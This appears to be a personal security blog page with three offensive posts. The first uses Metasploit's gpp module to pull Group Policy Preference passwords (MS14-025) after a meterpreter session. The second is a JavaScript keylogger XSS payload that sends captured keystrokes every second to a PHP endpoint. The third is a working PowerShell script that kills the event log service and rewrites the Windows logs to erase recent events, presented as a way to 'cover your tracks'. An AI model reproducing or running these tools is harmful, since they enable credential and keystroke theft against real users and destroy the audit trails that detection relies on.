Windows Gather Group Policy Preference Saved Passwords

Hi All,

Thought I would put up a post about a exploit that is rearing its head recently and it has to do with the way Group Policy stores credentials for local users and groups, services and scheduled tasks.  Specifically named MS14-025.  Now MS have done a great job of encrypting the passwords in group policy.  But a terrible job of keeping the private key secret :-P...  Below is a short example of how you can use the gpp meterpreter module in metasploit to exploit this.

So this exploit was run on the DC but can be used in other places if necessary.  I will work on a python script soon to extract the value out of the xml file and then unencrypt it.

First lets create a new user

 

Lets run the exploit to get a reverse handler and meterpreter session. Getsystem privs and then background the session.

 
Lets use the gpp module
use post/windows/gather/credentials/gpp
set session 2

run 

the results!

Keylogger XSS - Javascript

Hi All,

This is just a quick post to drop out my keylogger.  A lot of people have these around but thought I would share it with all of you.

Cheers.

<script>
var keys = '';
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}
window.setInterval(function(){
    new Image().src = 'http://localhost/keylogger.php?c=' + keys;
    keys = '';
}, 1000);
</script>

Clear Event Logs After Certain Time

The below script will export all of the events in event viewer excluding the last two hours.  Then will reimport.  You can update the hours to clear to be whatever you want.  This is useful when you need to cover your tracks. 

Open powershell as an administrator (THIS IS IMPORTANT)


#Remove Traces
$remove = $true
#Temporary Work Directory.
$tempdir = "C:\temp"
 
#How Many Hours of logs do you want to clear. Type '-2' for two hours
$hourstoclear = "-2"

#Start time
$start = (get-date).addhours($hourstoclear)
 
#Get Event locations
$secloc = (Get-ItemProperty -Path HKLM:System\Controlset001\services\Eventlog\Security -name "File").file
$apploc = (Get-ItemProperty -Path HKLM:System\Controlset001\services\Eventlog\Application -name "File").file
$sysloc = (Get-ItemProperty -Path HKLM:System\Controlset001\services\Eventlog\System -name "File").file
function GetMilliseconds ($date) {
    $ts = New-TimeSpan -Start $date -End (Get-Date)
    [math]::Round($ts.TotalMilliseconds)
    } # end function
$startDate = GetMilliseconds(Get-Date $start)
#Export Results to EVTX
wevtutil epl Security $tempdir\Security.evtx /q:"*[System[TimeCreated[timediff(@SystemTime) >= $startDate]]]"
wevtutil epl Application $tempdir\Application.evtx /q:"*[System[TimeCreated[timediff(@SystemTime) >= $startDate]]]"
wevtutil epl System $tempdir\System.evtx /q:"*[System[TimeCreated[timediff(@SystemTime) >= $startDate]]]"
$procid = (Get-WmiObject Win32_Process -Filter "name = 'svchost.exe'" | where {$_.commandline -like "*LocalServiceNetworkRestricted*"}).processid
#Kill Event log Task
taskkill /PID $procid /F

#Copy events over.
xcopy $tempdir\Security.evtx $secloc /y
xcopy $tempdir\Application.evtx $apploc /y
xcopy $tempdir\System.evtx $sysloc /y

#Start windows event log
Get-Service "Windows Event Log" | Start-Service

#Remove exports of event logs.
if($remove -eq $true){
remove-item $tempdir\Security.evtx
remove-item $tempdir\Application.evtx
remove-item $tempdir\System.evtx
}